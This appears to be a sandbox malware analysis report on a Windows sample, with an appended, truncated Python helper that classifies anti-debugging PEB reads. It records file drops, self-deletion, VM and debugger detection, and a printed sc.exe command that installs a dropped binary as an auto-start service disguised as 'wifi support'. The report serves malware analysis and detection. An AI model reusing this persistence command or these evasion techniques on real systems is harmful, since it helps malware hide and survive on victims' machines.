                      Source: 37.2.3D34.exe.150000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 37.0.3D34.exe.150000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 37.0.3D34.exe.150000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: unknown | Executable created and started: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jgdhbua
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\888A.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D936.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\3D34.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\9889.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D502.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\BB8A.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\FB58.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe (copy)
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\CADF.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\A4DE.exe
Source: C:\Users\user\AppData\Local\Temp\D936.exe | File created: C:\Users\user\AppData\Local\Temp\krmdinzg.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6C37.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\E3A9.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\A332.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\CCB2.exe
Source: C:\Windows\SysWOW64\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\qeprvgom
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\ecd2mpebsf.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\jgdhbua:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ECD2MpEBSf.exe, 00000001.00000002.721906025.0000000001FA0000.00000004.00000001.sdmp, jgdhbua, 0000000B.00000002.776633448.000000000051B000.00000004.00000020.sdmp | Binary or memory string: ASWHOOK
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\E3A9.exe | RDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\E3A9.exe | RDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007F6C94EE7CC4h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007F6C94F14070h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
Source: C:\Users\user\AppData\Local\Temp\E3A9.exe | RDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\jgdhbua | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00406AA0
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00686CF0
Found evasive API chain (may stop execution after checking computer name)
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep
Source: C:\Windows\explorer.exe TID: 6548 | Thread sleep count: 609 > 30
Source: C:\Windows\explorer.exe TID: 6500 | Thread sleep count: 248 > 30
Source: C:\Windows\explorer.exe TID: 6504 | Thread sleep count: 286 > 30
Source: C:\Windows\explorer.exe TID: 5460 | Thread sleep count: 376 > 30
Source: C:\Windows\explorer.exe TID: 6392 | Thread sleep count: 200 > 30
Source: C:\Users\user\AppData\Local\Temp\3D34.exe TID: 5488 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6656 | Thread sleep time: -210000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 3408 | Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 3408 | Thread sleep time: -52000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 609
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 376
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | API coverage: 8.1 %
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | API coverage: 6.2 %
Source: C:\Users\user\AppData\Local\Temp\D936.exe | API coverage: 5.9 %
Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00686CF0
Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\888A.exe
Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9889.exe
Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A4DE.exe
Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6C37.exe
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | API call chain: ExitProcess graph end node
Source: explorer.exe, 00000005.00000000.714532434.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.711357755.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.715039633.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
Source: WerFault.exe, 00000010.00000002.807170745.00000000049D8000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.803902943.00000000049D6000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.818844082.000002A078C83000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.819053495.000002A078CEE000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000010.00000002.806997904.0000000004960000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW8$
Source: explorer.exe, 00000005.00000000.679464850.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.715039633.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.715488608.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_004198CC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00688A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_006812E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_006814D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00686090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00689930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00689BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00689D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | System information queried: ModuleInformation

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\jgdhbua | System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_0042D770 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_00570042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 9_2_006F0042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_00690083 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_0208092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe | Code function: 12_2_02080D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00401000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0040C180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0068092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00681250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_0068C3D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00680D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_022B092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_022B0D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Code function: 32_2_006C092B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Code function: 32_2_006C0D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\jgdhbua | Process queried: DebugPort
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_00422B00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_0042CB72 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_00419B15 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Memory protected: page guard
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_0043AA10 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_00422B00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_0042BCB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00428520 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
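The fs:[00000030h] reads listed above are loads of the 32-bit PEB pointer, which by itself is not proof of anti-debugging: the same load starts a benign module walk through PEB.Ldr. What distinguishes a BeingDebugged or NtGlobalFlag check from API resolution is the offset the loaded register is dereferenced at a few instructions later. The helper below is an added triage example, not part of the sandbox report; it tracks the register that received the PEB pointer and classifies the next dereference. The disassembly it runs on is constructed in the report's operand notation, and the offsets are the public 32-bit PEB layout.

```python
"""Classify what an fs:[30h] (PEB) load feeds: anti-debug check or plain module walk.

Added example, not part of the sandbox report. Disassembly below is constructed.
"""
import re
from typing import Dict, List, Tuple

# 32-bit PEB fields commonly read right after the fs:[30h] load.
PEB_FIELDS = {
    0x02: ("BeingDebugged", "anti-debug"),
    0x0C: ("Ldr", "module-walk"),          # manual API resolution, usually not anti-debug
    0x18: ("ProcessHeap", "heap-flags"),    # precedes a HEAP.Flags / ForceFlags check
    0x68: ("NtGlobalFlag", "anti-debug"),
}
REG = r"e[a-d]x|e[sd]i|ebp"
# "mov eax, dword ptr fs:[00000030h]" (report notation) or "mov eax, fs:[0x30]"
PEB_LOAD = re.compile(rf"\bmov\s+(?P<reg>{REG})\s*,\s*(?:dword ptr\s+)?fs:\[(?:0x)?0*30h?\]", re.I)
# any later memory operand through that register, e.g. "byte ptr [eax+2]"
DEREF = re.compile(rf"\[(?P<reg>{REG})\s*\+\s*(?P<off>0x[0-9a-f]+|[0-9a-f]+h|\d+)\]", re.I)
# instructions whose first operand overwrites the register (it no longer holds the PEB)
WRITES_REG = re.compile(rf"\b(?:mov|movzx|lea|xor|pop)\s+(?P<reg>{REG})\b", re.I)

def parse_offset(tok: str) -> int:
    tok = tok.lower()
    if tok.startswith("0x"):
        return int(tok, 16)
    if tok.endswith("h"):
        return int(tok[:-1], 16)
    return int(tok, 10)

def classify_peb_reads(disasm: List[str], window: int = 8) -> List[Tuple[int, str, str]]:
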